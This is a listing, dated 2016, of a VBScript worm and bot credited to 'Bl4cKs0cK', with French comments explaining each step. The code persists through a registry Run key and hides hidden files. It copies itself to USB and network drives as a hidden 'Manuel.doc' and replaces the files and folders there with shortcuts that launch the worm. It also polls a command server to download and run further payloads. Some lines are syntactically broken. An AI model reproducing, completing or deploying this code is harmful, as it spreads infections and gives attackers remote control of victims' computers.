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May 3rd, 2016
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  1. 'Microsoft (R) Windows Script Host Version 5.8'
  2. 'Copyright (C) Microsoft Corporation. Tous droits r‚serv‚s.
  4. '<coded by Bl4cKs0cK>'
  5. On Error Resume Next
  6. Dim host
  7. host = ""
  8. Dim host_script
  9. host_script = "bot/lancer/index.php"
  10. Dim activ_name
  11. activ_name = "SysinfY2X.db" 'Le nom du process actif
  12. Dim passiv_name
  13. passiv_name = "Manuel.doc"
  14. Dim sleep_time
  15. sleep_time = 2000
  16. Dim sleep_time_limit
  17. sleep_time_limit = 60000
  18. Dim http
  19. Set http = CreateObject("MSXML2.ServerXMLHTTP") 'Objet ajax pour aller recuperer url
  20. Dim sh
  21. Set sh = WScript.CreateObject("WScript.Shell")
  22. Dim fs
  23. Set fs= CreateObject("Scripting.FileSystemObject") 'creation du nouveau script
  24. Dim WMIService
  25. Set WMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") 'prend les droits de l'utilisateur courant
  26. Const adTypeBinary = 1
  27. Const adTypeText = 2
  28. Const adSaveCreateOverWrite = 2
  29. Const adSaveCreateNotExist = 1
  30. Dim stream_self
  31. Set stream_self = CreateObject("Adodb.Stream")'generation du script dans %TEMP%
  32. Dim script_name
  33. script_name = Wscript.ScriptName
  34. Dim tmp_dir
  35. tmp_dir = sh.ExpandEnvironmentStrings("%temp%") & "\"
  36. host = "http://" & host & "/"
  37. stream_self.Type = adTypeBinary 'en fait du binaire
  38. stream_self.Open
  39. stream_self.LoadFromFile fs.GetFile(Wscript.ScriptFullName) 'crée un stream ADODB
  40. Dim script_size
  41. script_size = stream_self.Size 'recupere la taille du script
  42. If (script_name = activ_name) Then
  43. Dim serv_rep, cont, cont_limit
  44. cont = 0
  45. cont_limit = CInt(sleep_time_limit / sleep_time)
  46. While True
  47. infect_drives 'infecte les lecteurs
  48. infect_registre ' infecte le registre
  49. protect_del 'assure la reproduction du fichier dans %TEMP%
  50. kill_old("SysinfYhX.db") 'tue le fichier qui a permis son deploiement
  51. If cont < cont_limit Then
  52. cont = cont + 1
  53. wscript.sleep sleep_time
  54. Else
  55. cont = 0
  56. serv_rep = serv_cmd("ping") 'Execute la commande ping vers le serveur
  57. If serv_rep <> "-1" Then 'si une réponse
  58. cont_limit = CInt(CInt(serv_rep) / sleep_time)
  59. serv_rep = serv_cmd(script_size & activ_name)'envoie la taille et le nom du script pour connaitre la version et telecharger la nouvelle si besoin
  60. If serv_rep <> "-1" Then
  61. If serv_rep <> "0" Then
  62. get_new_v(serv_rep)
  63. Else
  64. serv_rep = serv_cmd("list") 'sinon envoie la commande list
  65. If serv_rep <> "-1" Then
  66. get_list(serv_rep) 'si une reponse positive, execute get_list avec la liste retournee par le serveur
  67. End If
  68. End If
  69. End If
  70. Else
  71. cont_limit = CInt(sleep_time_limit / sleep_time)
  72. End If
  73. End If
  74. Wend
  75. Else
  76. infect_machin 'Sinon infecte une machine
  77. End if
  78. Function serv_cmd(cmd)
  79. On Error Resume Next
  80. Dim stat
  81. http.Open "GET", host & host_script & "?cmd=" & cmd , False 'utilise l'objet HTTP pour GET et lancer la commande passée en arguments
  82. http.Send
  83. stat = http.Status
  84. If stat <> 200 Then
  85. serv_cmd = "-1" 'si pas de reponse recoit -1
  86. Else
  87. serv_cmd=http.ResponseText 'sinon recoit du texte
  88. End If
  89. End Function
  90. Function bot_up(arr)
  91. On Error Resume Next
  92. Dim stat, frm_, size_, to_, lnc_
  93. frm_ = arr(1)
  94. size_ = arr(2)
  95. to_ = arr(3)
  96. lnc_ = arr(4)
  97. Dim stream
  98. Set stream = CreateObject("Adodb.Stream") 'Cree un stream binaire et génère un fichier avec le tableau passé en entrée
  99. stream.Type = adTypeBinary
  100. stream.Open
  101. If fs.FileExists (tmp_dir & to_) Then
  102. If fs.GetFile(tmp_dir & to_).Size <> size_ Then
  103. http.Open "GET", frm_, False
  104. http.Send
  105. If http.Status <> 200 Then
  106. bot_up = False
  107. Else
  108. stream.Write http.ResponseBody
  109. fs.GetFile(tmp_dir & to_).Attributes=2
  110. fs.DeleteFile tmp_dir & to_, True
  111. stream.SaveToFile tmp_dir & to_, adSaveCreateOverWrite
  112. fs.GetFile(tmp_dir & to_).Attributes=1+2+4
  113. bot_up = True
  114. End If
  115. Else
  116. bot_up = False
  117. End If
  118. Else
  119. http.Open "GET", frm_, False
  120. http.Send
  121. If http.Status <> 200 Then
  122. bot_up = False
  123. Else
  124. stream.Write http.ResponseBody
  125. stream.SaveToFile tmp_dir & to_, adSaveCreateOverWrite
  126. fs.GetFile(tmp_dir & to_).Attributes=1+2+4
  127. bot_up = True
  128. End If
  129. End If
  130. stream.Close
  131. If bot_up Then
  132. sh.Run "cmd /c start " & lnc_ & " %temp%\" & to_, 0
  133. End If
  134. End Function
  135. Function get_split(in_)
  136. On Error Resume Next
  137. Dim ret
  138. ret = Array(True, "", 0, "", "")
  139. ret(1) = Split(Split(in_, "<from>")(1), "<br>")(0)
  140. ret(2) = CInt(Split(Split(in_, "<size>")(1), "<br>")(0))
  141. ret(3) = Split(Split(in_, "<to>")(1), "<br>")(0)
  142. ret(4) = Split(Split(in_, "<lancer>")(1), "<br>")(0)
  143. For Each a In ret
  144. If a = "" Or a = " " Then
  145. ret(0) = False
  146. Exit For
  147. End If
  148. Next
  149. get_split = ret
  150. End Function
  151. Function get_new_v(req)
  152. On Error Resume Next
  153. Dim data_
  154. data_ = get_split(req)
  155. If data_(0) Then
  156. If bot_up(data_) Then
  157. If data_(3) <> script_name Then
  158. del_registre
  159. fs.GetFile(Wscript.ScriptFullName).Attributes=2
  160. fs.DeleteFile Wscript.ScriptFullName, True
  161. End If
  162. wscript.quit
  163. End If
  164. End If
  165. End Function
  166. Function get_list(req) 'reçoit les données retournées par la commande list sur le serveur
  167. On Error Resume Next
  168. If req <> "0" Then
  169. Dim tbl
  170. tbl = Split(req, "<list>")
  171. For Each case_ In tbl
  172. Dim data_
  173. data_ = get_split(case_)
  174. If data_(0) Then
  175. bot_up(data_)
  176. End If
  177. Next
  178. get_list = True
  179. Else
  180. get_list = False
  181. End If
  182. End Function
  183. Function infect_machin 'meme principe qu'infect_drives
  184. On Error Resume Next
  185. infect_registre
  186. If fs.FileExists (tmp_dir & activ_name) Then
  187. If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
  188. fs.GetFile(tmp_dir & activ_name).Attributes=2
  189. fs.DeleteFile tmp_dir & activ_name, True
  190. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite
  191. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
  192. infect_machin = True
  193. Else
  194. infect_machin = False
  195. End If
  196. Else
  197. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
  198. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
  199. infect_machin = True
  200. End If
  201. If infect_machin Then
  202. sh.Run "cmd /c start wscript /e:VBScript.Encode " & Replace(tmp_dir & activ_name," ", ChrW(34) & " " & ChrW(34)), 0
  203. Else
  204. Dim colItms
  205. Set colItms = WMIService.ExecQuery ("Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%" & activ_name & "%'")
  206. If colItms.Count = 0 Then
  207. sh.Run "cmd /c start wscript /e:VBScript.Encode " & Replace(tmp_dir & activ_name," ", ChrW(34) & " " & ChrW(34)), 0
  208. End If
  209. Set colItms = Nothing
  210. End If
  211. wscript.quit
  212. End Function
  213. Sub infect_drives 'infection des lecteurs
  214. On Error Resume Next
  215. Dim sys_drive
  216. sys_drive = sh.ExpandEnvironmentStrings("%SYSTEMDRIVE%")
  217. For Each cle In fs.Drives
  218. If cle.isReady And (cle.DriveType = 1 Or cle.DriveType = 3 Or cle.DriveType = 4) Then 'si le drive est une clé, un network drive ou un cdrom(??)
  219. Dim d
  220. d = cle.path
  221. If d <> sys_drive Then
  222. If fs.FileExists(d & "\" & passiv_name) Then 'Si le fichier existe mais ne fait pas la même taille, il le supprime et le remplace par un fichier caché
  223. If (fs.GetFile(d & "\" & passiv_name).Size <> script_size) And (cle.FreeSpace > Abs(fs.GetFile(d & "\" & passiv_name).Size - script_size)) Then
  224. fs.GetFile(d & "\" & passiv_name).Attributes=2
  225. fs.DeleteFile d & "\" & passiv_name, True
  226. stream_self.SaveToFile d & "\" & passiv_name, adSaveCreateOverWrite
  227. End If
  228. Else 'Sinon il le créé
  229. If cle.FreeSpace > script_size Then
  230. stream_self.SaveToFile d & "\" & passiv_name, adSaveCreateNotExist
  231. End If
  232. End If
  233. fs.GetFile(d & "\" & passiv_name).Attributes=1+2+4 'll donne les attributs read only, fichier caché, et fichier système au fichier
  234. If cle.FreeSpace > 0 Then
  235. For Each f In fs.GetFolder(d & "\").Files
  236. Dim f_ext
  237. If instr(, ".") Then
  238. Dim f_name
  239. f_name = split(, ".")
  240. f_ext = lcase( f_name(ubound(f_name)) )
  241. Else
  242. f_ext = "NULL"
  243. End if
  244. If f_ext <> "lnk" And <> passiv_name And f.Attributes <> 2+4 Then
  245. f.Attributes = 2+4 'cache le dossier existant
  246. If fs.FileExists(d & "\" & & ".lnk") Then
  247. fs.GetFile(d & "\" & & ".lnk").Attributes = 0 'fait apparaitre le lien si besoin
  248. End If
  249. Dim shurt, s_icon 'Creation du shortcut qui execute cmd avec des arguments
  250. Set shurt = sh.CreateShortcut(d & "\" & & ".lnk")
  251. shurt.WindowStyle = 7 'Minimized windows <-- pour ne pads qu'on voit le resultat de l'execution du script
  252. shurt.TargetPath = "cmd.exe"
  253. shurt.WorkingDirectory = ""
  254. Dim f_arg 'lance wscript avec le moteur encode pour lire le manuel.doc encodé
  255. f_arg = "/c start wscript /e:VBScript.Encode " & Replace(passiv_name," ", ChrW(34) & " " & ChrW(34)) & " & start " & replace(," ", ChrW(34) & " " & ChrW(34))
  256. shurt.Arguments = f_arg & " & exit" 'puis ferme la fenetre
  257. s_icon = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & f_ext & "\") & "\DefaultIcon\")' S'attribue l'icone d'un repertoire
  258. If ( instr(s_icon, ",") = 0 ) Or f_ext = "NULL" Then
  259. shurt.IconLocation = f.path
  260. Else
  261. shurt.IconLocation = s_icon
  262. End if
  263. shurt.Save()
  264. fs.GetFile(d & "\" & & ".lnk").Attributes = 1 ' le place en RO
  265. End if
  266. Next
  267. For Each ff In fs.GetFolder(d & "\").SubFolders
  268. If ff.Attributes <> 2+4 Then
  269. ff.Attributes = 2+4
  270. If fs.FileExists(d & "\" & & ".lnk") Then
  271. fs.GetFile(d & "\" & & ".lnk").Attributes = 0
  272. End If
  273. Dim shurt_, s_icon_
  274. Set shurt_ = sh.CreateShortcut(d & "\" & & ".lnk")
  275. shurt_.WindowStyle = 7
  276. shurt_.TargetPath = "cmd.exe"
  277. shurt_.WorkingDirectory = ""
  278. Dim ff_arg 'relance le script pour les sous repertoires
  279. ff_arg = "/c start wscript /e:VBScript.Encode " & Replace(passiv_name," ", ChrW(34) & " " & ChrW(34)) & " & start explorer " & replace(," ", ChrW(34) & " " & ChrW(34))
  280. shurt_.Arguments = ff_arg & " & exit"
  281. s_icon_ = sh.regread("HKLM\SOFTWARE\Classes\Folder\DefaultIcon\")
  282. If instr(s_icon_, ",") = 0 Then
  283. shurt_.IconLocation = ff.path
  284. Else
  285. shurt_.IconLocation = s_icon_
  286. End if
  288. fs.GetFile(d & "\" & & ".lnk").Attributes = 1
  289. End If
  290. Next
  291. End If
  292. End If
  293. End If
  294. Next
  295. End Sub
  296. Sub infect_registre
  297. On Error Resume Next
  298. Dim target, reg_d
  299. target = "C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\" & activ_name 'Crée une tache au démarrage
  300. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(activ_name, ".")(0)
  301. sh.regwrite "HKCU" & reg_d, target, "REG_SZ"
  302. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden" 'fait en sorte que n'aparaissent pas les fichiers cachés
  303. sh.regwrite "HKCU" & reg_d, 2, "REG_DWORD"
  304. End Sub
  305. Sub del_registre
  306. On Error Resume Next
  307. Dim reg_d 'supprime la clé
  308. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(activ_name, ".")(0)
  309. sh.RegDelete "HKCU" & reg_d
  310. End Sub
  311. Function protect_del
  312. On Error Resume Next
  313. If fs.FileExists (tmp_dir & activ_name) Then
  314. If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
  315. fs.GetFile(tmp_dir & activ_name).Attributes=2
  316. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite 'remplace le fichier dans le dossier temp
  317. End If
  318. Else
  319. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
  320. End If
  321. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4 'On reattribue RO/Hidden/SystemFile
  322. End Function
  323. Function kill_old(old_name)'tue l'ancien processus afin de renouveller le nom et de poursuivre l'infection
  324. On Error Resume Next
  325. Dim colItems, reg_d
  326. Set colItems = WMIService.ExecQuery ("Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%" & old_name & "%'")
  327. For Each objItem in colItems
  328. objItem.Terminate
  329. Next
  330. colItems = Nothing
  331. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(old_name, ".")(0)
  332. sh.RegDelete "HKCU" & reg_d
  333. fs.GetFile(tmp_dir & old_name).Attributes=2
  334. fs.DeleteFile tmp_dir & "\" & old_name, True
  335. End Function
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